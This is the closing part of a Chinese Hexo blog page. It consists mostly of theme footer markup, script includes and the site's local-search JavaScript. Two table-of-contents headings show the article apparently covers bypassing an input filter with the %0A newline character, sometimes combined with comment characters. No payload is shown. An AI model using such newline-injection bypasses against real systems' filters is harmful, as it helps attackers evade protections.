nav-level-3"><a class="nav-link" href="#用于绕过的核心字符：-0A，某些特殊场合需要和注释符配合使用。"><span class="nav-number">2.2.1.</span> <span class="nav-text">用于绕过的核心字符：%0A，某些特殊场合需要和注释符配合使用。</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#输入如下被拦截"><span class="nav-number">2.2.2.</span> <span class="nav-text">输入如下被拦截</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Note</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.1"></script>



  


  




	





  





  





  






  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      $('#local-search-input').focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';
      $.ajax({
        url: path,
        dataType: "xml",
        async: true,
        success: function( xmlResponse ) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = $( "entry", xmlResponse ).map(function() {
            return {
              title: $( "title", this ).text(),
              content: $("content",this).text(),
              url: $( "url" , this).text()
            };
          }).get();
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }
          proceedsearch();
        }
      });}

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  

  

</body>
</html>
